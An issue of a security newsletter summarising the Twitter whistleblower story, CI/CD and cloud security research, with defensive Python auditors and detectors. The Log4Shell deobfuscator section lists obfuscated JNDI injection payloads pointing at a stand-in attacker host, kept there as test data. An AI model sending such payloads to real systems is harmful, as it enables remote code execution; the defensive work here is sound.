[tl;dr sec] #147 - Twitter Whistleblower, CI/CD Security, How to Think About Endpoint Security
Mudge's accusations about Twitter's security posture, identity management risks in GitHub orgs, a paper comparing six CI providers and examining GitHub workflows at scale, and Ryan McGeehan offering valuable context on how to read Mudge's comments about Twitter's endpoints and how to think about endpoint security at your own company.
I hope you’ve been doing well!
When someone keeps asking you for incident response or status updates in general, feel free to share this.
Last week I messed up the following link, apologies: RCE-as-a-Service: Lessons Learned from 5 Years of Real-World CI/CD Pipeline Compromise (and slides).
It was fixed quickly on the blog after the email was sent, but here it is for your convenience.
📢 Just Released: Q3 2022 State of API Security Report
Do you have visibility into your organization's API attack surface? If you experienced an API security incident last year, you're not alone. 94% of organizations have had API security problems. Industry-leading research from Salt Security examines how companies secure APIs, the challenges they face, and how their API security strategies are evolving. Download the report to benchmark yourself and improve API security for your company.
📜 In this newsletter...
AppSec: Experimental Elixir support in Semgrep, GitHub now supports SSH commit verification, tool to simplify review and management of threat models in documents
Web Security: Client side desync CTF exercise, collection of tools for web hackers, awesome browser security resources
CI/CD: The Consequences of Inadequate Identity Management in your GitHub Organization, academic paper examining GitHub Action workflow security and 5 other CI providers
Cloud Security: Three AWS Lambda guardrails, detecting suspicious activity in your AWS account using decoy resources
Container Security: Small Linux VM ready to run containers for macOS on ARM, auditing Kubernetes RBAC
Blue Team: Tool to deobfuscate Log4Shell payloads, BloodHound but for the blue team, endpoint security: intuition around the Mudge disclosures
Misc: They say all strongmen are dumb, Twitter advanced search cheatsheet, how to ask and get a yes
Twitter & Security: Coverage on Mudge's whistleblowing from a number of outlets and perspectives
A tool by Dave Soldera that simplifies the review and management of threat models in documents. threatware is an AWS Lambda function (or CLI tool) with methods to help review threat models (e.g. validate formatting, output the threat model in a machine-readable format) and provide a process to manage them (e.g. version control for threat models). It works directly with threat models as documents in Confluence/Google Docs.
A curated list of awesome browser security learning material by Opera’s Cezary Cerekwicki. Covers good intro material, security challenges and corresponding mitigations, attacks on browsers, and more.
The Consequences of Inadequate Identity Management in your GitHub Organization
Cider Security’s Omer Gil and Yaron Avital outline several risks when not using SSO (and SCIM) to authenticate to GitHub.
When inviting users by email address or GitHub username, they could be using a non-corporate email that you have no control over, and/or they could switch to a private email in the future (which an attacker could compromise).
When users log in to GitHub without SSO, removing them from your IdP will not remove them from your GitHub org; you'll need to do that separately.
Deactivating a user in the IdP only prevents them from re-authenticating to GitHub's website; their Personal Access Tokens and SSH keys will continue to work.
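The first two risks above are checkable today: the org's member list (REST, `GET /orgs/{org}/members`) and its linked SAML identities (GraphQL, `organization.samlIdentityProvider.externalIdentities`, whose nodes carry `samlIdentity.nameId` and `user.login`) can be diffed. The script below is an added example, not code from the Cider Security post or from GitHub; both API responses are constructed inline so it runs offline, and the corporate email domain is an assumption.

```python
"""Audit SSO coverage of a GitHub organization's membership.

Added example; not code from the Cider Security post or from GitHub.
It works on two API responses whose shape is documented by GitHub:
  REST    GET /orgs/{org}/members                       -> [{"login": ...}, ...]
  GraphQL organization.samlIdentityProvider.externalIdentities
          -> edges[].node.{samlIdentity.nameId, user.login}
Both are constructed inline below so the script runs offline; the
corporate email domain is an assumption.
"""

CORP_DOMAIN = "example.com"  # assumption: the domain your IdP issues nameIds under

# Constructed sample of GET /orgs/{org}/members
MEMBERS = [
    {"login": "alice"},
    {"login": "bob"},
    {"login": "carol-contractor"},  # invited by username, never linked to SSO
    {"login": "dave"},
]

# Constructed sample of the GraphQL externalIdentities connection
EXTERNAL_IDENTITIES = {
    "edges": [
        {"node": {"samlIdentity": {"nameId": "alice@example.com"}, "user": {"login": "alice"}}},
        {"node": {"samlIdentity": {"nameId": "bob@example.com"}, "user": {"login": "bob"}}},
        # Provisioned by SCIM but no GitHub account has claimed it yet
        {"node": {"samlIdentity": {"nameId": "erin@example.com"}, "user": None}},
        # Linked, but the nameId is not a corporate address
        {"node": {"samlIdentity": {"nameId": "dave@gmail.com"}, "user": {"login": "dave"}}},
    ]
}


def audit_sso_coverage(members, identities, corp_domain=CORP_DOMAIN):
    """Return three sorted lists of findings:

    members_without_sso    org members with no linked SAML identity; removing
                           them from the IdP will not remove them from the org
    unlinked_identities    IdP identities that no GitHub user has linked
    non_corporate_name_id  linked members whose nameId is outside corp_domain
    """
    linked = {}               # github login -> SAML nameId
    unlinked_identities = []
    for edge in identities["edges"]:
        node = edge["node"]
        name_id = node["samlIdentity"]["nameId"]
        if node["user"] is None:
            unlinked_identities.append(name_id)
        else:
            linked[node["user"]["login"]] = name_id

    member_logins = {m["login"] for m in members}
    suffix = "@" + corp_domain.lower()
    return {
        "members_without_sso": sorted(member_logins - linked.keys()),
        "unlinked_identities": sorted(unlinked_identities),
        "non_corporate_name_id": sorted(
            login for login, name_id in linked.items()
            if login in member_logins and not name_id.lower().endswith(suffix)
        ),
    }


if __name__ == "__main__":
    for kind, items in audit_sso_coverage(MEMBERS, EXTERNAL_IDENTITIES).items():
        print(f"{kind}: {', '.join(items) or '-'}")
```

Every login in `members_without_sso` is an account whose offboarding has to happen inside GitHub, and, per the third point above, whose Personal Access Tokens and SSH keys have to be revoked there as well rather than assumed dead once the IdP account is disabled.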
Characterizing the Security of Github CI Workflows
Usenix paper that defines four security properties that must hold to secure CI/CD platforms from supply-chain attacks: Admittance Control, Execution Control, Code Control, and Access to Secrets.
They then examine GitHub CI and five other public CI/CD platforms against these properties, and investigate the security implications of how developers actually use workflows in GitHub CI.
Finally, they released GWChecker, a GitHub Actions YAML auditing tool that looks for plaintext secrets (via regex), mutable tags used for versioning instead of commit SHAs, non-verified actions or actions not published on the Marketplace, and insecure triggers. GWChecker also installs a pre-commit hook that ensures committed files are not in .github/workflows, to avoid having workflows that commit other workflow-related files to the repository.
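To make those four checks concrete, here is an added example of a workflow auditor in the same spirit. It is not GWChecker or code from the paper: a stdlib-only, line-oriented scanner (no YAML parser) that flags regex-matched plaintext secrets, `uses:` references pinned to a tag or branch rather than a 40-character commit SHA, actions from publishers outside a hypothetical trusted-publisher allowlist (an offline stand-in for the Marketplace verified-creator check), and the `pull_request_target` / `workflow_run` triggers, plus the classic follow-on of checking out the PR head under `pull_request_target`. The sample workflow is constructed.

```python
"""Audit a GitHub Actions workflow for the classes of issue GWChecker looks for.

Added example, not GWChecker itself or code from the paper. Stdlib-only,
line-oriented (no YAML parser). Flags:
  - plaintext secrets matched by regex,
  - actions referenced by a mutable tag/branch instead of a 40-hex commit SHA,
  - actions from publishers outside TRUSTED_PUBLISHERS (an assumed allowlist
    standing in for the Marketplace "verified creator" check),
  - insecure triggers, and a PR-head checkout under pull_request_target.
The sample workflow at the bottom is constructed for the demo.
"""
import re

SHA_RE = re.compile(r"^[0-9a-f]{40}$")
USES_RE = re.compile(r"^\s*-?\s*uses:\s*([^\s#]+)")
KEY_RE = re.compile(r"^(\s*)([A-Za-z_][\w-]*):\s*(.*)$")
PR_HEAD_RE = re.compile(r"github\.event\.pull_request\.head\.(sha|ref)")
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "hardcoded_credential": re.compile(r"(?i)(password|passwd|token)\s*[:=]\s*['\"][^'\"]{8,}['\"]"),
}
TRUSTED_PUBLISHERS = {"actions", "github"}            # assumption
INSECURE_TRIGGERS = {"pull_request_target", "workflow_run"}


def declared_triggers(lines):
    """Map event name -> line number for the top-level `on:` key.
    Handles `on: push`, `on: [push, pull_request]`, and the block form."""
    triggers, in_on, child_indent = {}, False, None
    for lineno, raw in enumerate(lines, 1):
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        indent = len(raw) - len(raw.lstrip(" "))
        m = KEY_RE.match(raw)
        if in_on:
            if indent > 0:
                child_indent = child_indent or indent  # first nested level = event names
                if indent == child_indent:
                    s = raw.strip()
                    if s.startswith("- "):
                        triggers[s[2:].strip()] = lineno
                    elif m:
                        triggers[m.group(2)] = lineno
                continue
            in_on = False                              # back at column 0: block ended
        if m and indent == 0 and m.group(2) == "on":
            rest = m.group(3).strip()
            if rest:                                   # inline scalar or flow list
                for t in rest.strip("[]").split(","):
                    if t.strip():
                        triggers[t.strip()] = lineno
            else:
                in_on, child_indent = True, None
    return triggers


def audit_workflow(text):
    """Return sorted (line, kind, detail) findings for one workflow file."""
    lines = text.splitlines()
    triggers = declared_triggers(lines)
    findings = [(ln, "insecure_trigger", t) for t, ln in triggers.items() if t in INSECURE_TRIGGERS]
    for lineno, line in enumerate(lines, 1):
        if "${{" not in line:                          # ${{ secrets.X }} expressions are fine
            for name, pat in SECRET_PATTERNS.items():
                if pat.search(line):
                    findings.append((lineno, "plaintext_secret", name))
        m = USES_RE.match(line)
        if m and not m.group(1).startswith(("./", "docker://")):
            ref = m.group(1)
            name, _, version = ref.partition("@")
            if not SHA_RE.match(version):              # tag or branch: mutable
                findings.append((lineno, "mutable_ref", ref))
            if name.split("/")[0] not in TRUSTED_PUBLISHERS:
                findings.append((lineno, "unverified_action", ref))
        if "pull_request_target" in triggers and PR_HEAD_RE.search(line):
            findings.append((lineno, "pr_head_checkout", line.strip()))
    return sorted(findings)


# Constructed workflow exhibiting every finding class once (and a correctly pinned action)
SAMPLE_WORKFLOW = """\
name: ci
on:
  pull_request_target:
    types: [opened, synchronize]
  push:
    branches: [main]
env:
  AWS_ACCESS_KEY_ID: AKIAIOSFODNN7EXAMPLE
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - uses: actions/setup-node@1a4442cacd436585916779262731d5b162bc6ec7
      - uses: some-user/cool-action@main
      - run: ./build.sh
        env:
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
"""

if __name__ == "__main__":
    for line, kind, detail in audit_workflow(SAMPLE_WORKFLOW):
        print(f"line {line:>3}  {kind:<18} {detail}")
```

Run over a checkout, pointing it at each file under `.github/workflows/`, the output reads as a to-do list: pin `actions/checkout` to a SHA, drop the hardcoded key, and either stop checking out the PR head under `pull_request_target` or split the privileged part into a separate workflow.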
Three Guardrails for AWS Lambda
Brian Tarbox describes three guardrails for Lambdas: code signing, decouple deploying from releasing with function versions and aliases, and do code scanning of new PRs using tools like Amazon CodeGuru Reviewer.
How to detect suspicious activity in your AWS account by using private decoy resources
AWS’s Maitreya Ranganath and Mark Keating describe how you can create low-cost private decoy AWS resources in your AWS accounts and configure them to generate alerts when they are accessed. See also the awesome canarytokens.org.
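The detection side of that idea, as an added example rather than the post's own EventBridge/Lambda wiring: given CloudTrail records and a hand-maintained list of decoy ARNs, alert on any event that names a decoy, after suppressing the one principal expected to touch it (the role that deploys the decoys; its name is assumed). The records are constructed inline and cover a management event (`GetSecretValue`), an S3 data event (`GetObject`), and a request that identifies the secret by friendly name rather than ARN.

```python
"""Flag CloudTrail events that touch private decoy resources.

Added example; not code from the AWS post, which wires the same idea up with
EventBridge rules and Lambda. Assumptions: the decoy ARNs and the role allowed
to touch them (the one that deploys them) are hand-maintained below; the
CloudTrail records follow the documented record format and are constructed
inline so the script runs offline.
"""
import json

DECOYS = {  # assumption: ARNs of the decoy secret and decoy bucket
    "arn:aws:secretsmanager:us-east-1:111122223333:secret:prod/db-master-AbCdEf",
    "arn:aws:s3:::acme-backups-private-2022",
}
ALLOWED_PRINCIPALS = {"DecoyDeployRole"}  # assumption: expected to touch decoys


def principal_name(event):
    """Role name for assumed-role sessions, else the IAM user, else the raw ARN."""
    ident = event.get("userIdentity", {})
    issuer = ident.get("sessionContext", {}).get("sessionIssuer", {})
    return issuer.get("userName") or ident.get("userName") or ident.get("arn", "unknown")


def referenced_resources(event):
    """Everything the event names: resources[].ARN plus request parameters that
    identify a bucket or secret (data events do not always fill `resources`)."""
    refs = {r["ARN"] for r in event.get("resources", []) if "ARN" in r}
    params = event.get("requestParameters") or {}
    if "bucketName" in params:
        refs.add("arn:aws:s3:::" + params["bucketName"])
    if "secretId" in params:
        refs.add(params["secretId"])            # may be a friendly name, not an ARN
    return refs


def matches_decoy(ref, decoy):
    if ref == decoy or ref.startswith(decoy + "/"):   # exact, or an object in the decoy bucket
        return True
    if ":secret:" in decoy and not ref.startswith("arn:"):
        # Secrets Manager ARNs end in "<name>-<6 random chars>"; compare on the name
        return decoy.rsplit(":secret:", 1)[1].rsplit("-", 1)[0] == ref
    return False


def detect(events):
    """One alert per event that touched a decoy, minus the allowlisted deployer."""
    alerts = []
    for ev in events:
        hits = sorted(d for d in DECOYS if any(matches_decoy(r, d) for r in referenced_resources(ev)))
        if not hits:
            continue
        who = principal_name(ev)
        if who in ALLOWED_PRINCIPALS:
            continue
        alerts.append({"time": ev["eventTime"], "event": ev["eventName"], "principal": who,
                       "source_ip": ev.get("sourceIPAddress"), "decoys": hits})
    return alerts


# Constructed CloudTrail excerpt: two decoy touches, one by the deployer, two benign events
SAMPLE_TRAIL = """{"Records": [
 {"eventTime": "2022-08-29T10:15:02Z", "eventSource": "secretsmanager.amazonaws.com", "eventName": "GetSecretValue",
  "sourceIPAddress": "203.0.113.7",
  "userIdentity": {"type": "AssumedRole", "arn": "arn:aws:sts::111122223333:assumed-role/WebAppRole/i-0abc",
                   "sessionContext": {"sessionIssuer": {"userName": "WebAppRole"}}},
  "requestParameters": {"secretId": "prod/db-master"},
  "resources": [{"ARN": "arn:aws:secretsmanager:us-east-1:111122223333:secret:prod/db-master-AbCdEf"}]},
 {"eventTime": "2022-08-29T10:16:40Z", "eventSource": "s3.amazonaws.com", "eventName": "GetObject",
  "sourceIPAddress": "203.0.113.7",
  "userIdentity": {"type": "IAMUser", "userName": "mallory", "arn": "arn:aws:iam::111122223333:user/mallory"},
  "requestParameters": {"bucketName": "acme-backups-private-2022", "key": "db.sql.gz"},
  "resources": [{"ARN": "arn:aws:s3:::acme-backups-private-2022/db.sql.gz"}, {"ARN": "arn:aws:s3:::acme-backups-private-2022"}]},
 {"eventTime": "2022-08-29T10:17:01Z", "eventSource": "s3.amazonaws.com", "eventName": "GetObject",
  "sourceIPAddress": "198.51.100.4",
  "userIdentity": {"type": "IAMUser", "userName": "alice", "arn": "arn:aws:iam::111122223333:user/alice"},
  "requestParameters": {"bucketName": "acme-assets", "key": "logo.png"},
  "resources": [{"ARN": "arn:aws:s3:::acme-assets/logo.png"}]},
 {"eventTime": "2022-08-29T10:18:22Z", "eventSource": "secretsmanager.amazonaws.com", "eventName": "DescribeSecret",
  "sourceIPAddress": "cloudformation.amazonaws.com",
  "userIdentity": {"type": "AssumedRole", "arn": "arn:aws:sts::111122223333:assumed-role/DecoyDeployRole/cfn",
                   "sessionContext": {"sessionIssuer": {"userName": "DecoyDeployRole"}}},
  "requestParameters": {"secretId": "arn:aws:secretsmanager:us-east-1:111122223333:secret:prod/db-master-AbCdEf"},
  "resources": []},
 {"eventTime": "2022-08-29T10:19:05Z", "eventSource": "secretsmanager.amazonaws.com", "eventName": "ListSecrets",
  "sourceIPAddress": "198.51.100.4",
  "userIdentity": {"type": "IAMUser", "userName": "alice", "arn": "arn:aws:iam::111122223333:user/alice"},
  "requestParameters": null, "resources": []}
]}"""
SAMPLE_EVENTS = json.loads(SAMPLE_TRAIL)["Records"]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(json.dumps(alert))
```

Two details matter in practice: S3 `GetObject` only shows up if data events are enabled for the decoy bucket, and the allowlist should stay as narrow as the deployer role, since anything else that legitimately reads a decoy is a sign the decoy is not private enough.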
Auditing RBAC - Redux
Rory McCune walks through the challenges of auditing Kubernetes authorization (there are multiple modes: Node, ABAC, webhook, RBAC), complexities around RBAC, and useful tools to assess RBAC rights.
📢 Find and act on sensitive, toxic, and exposed data
Data is the last mile in any breach. For security engineering teams trying to locate sensitive, toxic, and exposed data within hundreds or thousands of accounts, billions of objects, and petabytes of data (sound familiar?), existing tooling doesn't work. You need a new approach. Open Raven is secure, private, and budget-safe data security that just works. Our platform prevents leaks, breaches, and compliance incidents by fully mapping data locations, types, and security posture and applying guardrails. Download the ebook to learn how to classify and protect cloud data at scale.
Since the release of Log4Shell, many tools were created to obfuscate Log4Shell payloads. This tool by Oxeye lets you unravel the true contents of obfuscated Log4Shell payloads with ease.
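The obfuscations those tools produce all lean on the same few Log4j lookup behaviours, which is why they can be undone mechanically. The following is an added example, not Oxeye's tool: it resolves the `${lower:…}` / `${upper:…}` case lookups and the `${anything:-default}` form (where the lookup can never resolve, so the default survives, covering `${::-j}`, `${env:NOPE:-j}` and friends) from the innermost layer outward until the string stops changing, then extracts the JNDI scheme and host. The payloads and the access-log line are constructed.

```python
"""Deobfuscate Log4Shell (CVE-2021-44228) lookup strings and extract the JNDI target.

Added example; not Oxeye's tool. Resolves the Log4j lookup tricks obfuscators
lean on, innermost first, until nothing changes:
  ${lower:X} / ${upper:X}   case-mapping lookups
  ${anything:-default}      a lookup that cannot resolve, so the default wins
                            (covers ${::-j}, ${env:NOPE:-j}, ${sys:x:-j}, ...)
Unknown lookups (including the final ${jndi:...}) are left in place.
Sample payloads and the log line are constructed.
"""
import re
from urllib.parse import unquote

INNER = re.compile(r"\$\{([^${}]*)\}")      # a lookup with no nested lookup inside it
JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^/:}\s]+)", re.IGNORECASE)


def _resolve(m):
    body = m.group(1)
    if ":-" in body:                        # ${key:-default}: the default value survives
        return body.split(":-", 1)[1]
    prefix, sep, arg = body.partition(":")
    if sep and prefix.lower() == "lower":
        return arg.lower()
    if sep and prefix.lower() == "upper":
        return arg.upper()
    return m.group(0)                       # not an obfuscation layer: keep verbatim


def deobfuscate(s, max_rounds=32):
    """Peel lookup layers from the inside out until the string is stable."""
    for _ in range(max_rounds):             # bound the work on adversarial input
        new = INNER.sub(_resolve, s)
        if new == s:
            break
        s = new
    return s


def extract_jndi(s):
    """Return [(scheme, host)] for every ${jndi:scheme://host...} in the cleaned string."""
    return [(scheme.lower(), host) for scheme, host in JNDI.findall(deobfuscate(s))]


def scan_log_line(line):
    """Percent-decode a raw access-log line, then report the JNDI callbacks hidden in it."""
    return extract_jndi(unquote(line))


# Constructed: the same target hidden four ways, one RMI variant, and a benign string
SAMPLES = [
    "${jndi:ldap://attacker.example/a}",
    "${${lower:j}${lower:n}${lower:d}${lower:i}:ldap://attacker.example/a}",
    "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attacker.example/a}",
    "${${env:NaN:-j}ndi:${lower:LDAP}://attacker.example/a}",
    "${${lower:${upper:j}}ndi:rmi://attacker.example/b}",
    "Hello ${name}",
]

# Constructed access-log line with the payload URL-encoded in the query string
SAMPLE_LOG_LINE = ('203.0.113.9 - - [10/Dec/2021:13:37:00 +0000] '
                   '"GET /?q=%24%7B%24%7Blower:j%7Dndi:%24%7Blower:LDAP%7D://attacker.example/x%7D HTTP/1.1" 200 -')

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s}\n  -> {deobfuscate(s)}  targets={extract_jndi(s)}")
    print(scan_log_line(SAMPLE_LOG_LINE))
```

Because an unresolvable lookup is returned unchanged, the loop terminates on its own once only `${jndi:…}` (or a benign `${name}`) is left; the round cap is there for pathological input rather than correctness. Feeding the cleaned string into an IOC match is what turns hundreds of cosmetic variants back into one `(scheme, host)` pair.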
BlueHound: Community Driven Resilience
Zero Networks’s Dekel Paz describes BlueHound, a tool that helps blue teams pinpoint the security issues that actually matter. By combining information about user permissions, network access and unpatched vulnerabilities, BlueHound reveals the paths attackers would take if they were inside your network.
Endpoint Security: Intuition around the Mudge Disclosures
Great post by Ryan McGeehan on the core things you should keep in mind about endpoint security, communicating with senior management, risk scenarios, measuring progress, practical realities, and more.
Politics / Privacy
Our commitment to election integrity
TikTok is rolling out an Election Center with authoritative info in 45 languages as U.S. midterms near.
Though trusting or relying on a Chinese company to not interfere with U.S. politics or attempt to influence public opinion (or rampantly steal IP) is like relying on McDonald’s to advocate for healthy living.
Though maybe Chinese companies are so good at censoring that they’ll actually do a better job at cracking down on misinformation (that doesn’t align with their interests) 🤔
They say all strongmen are dumb
This killed me 😂
Twitter & Security
Phew, quite some 🌶️ takes and infosec (and tech in general) drama this week.
Ex-Twitter exec blows the whistle, alleging reckless and negligent cybersecurity policies
Peiter Zatko (Mudge) filed a whistleblower complaint about Twitter, claiming things like: executive leadership is purposefully ignorant about the number of bots, there has been serial underinvestment in security, there are potential foreign agents on staff, and more.
See also his interview with Donie O’Sullivan.
Twitter CEO calls Mudge Zatko’s whistleblower report a ‘false narrative’
And that Mudge’s claims lack “important context.”
84 page PDF of Mudge’s whistleblower document
A redacted version of what was sent to the SEC, FTC, and DOJ.
✉️ Wrapping Up
Have questions, comments, or feedback? Just reply directly, I'd love to hear from you.
If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏
Thanks for reading!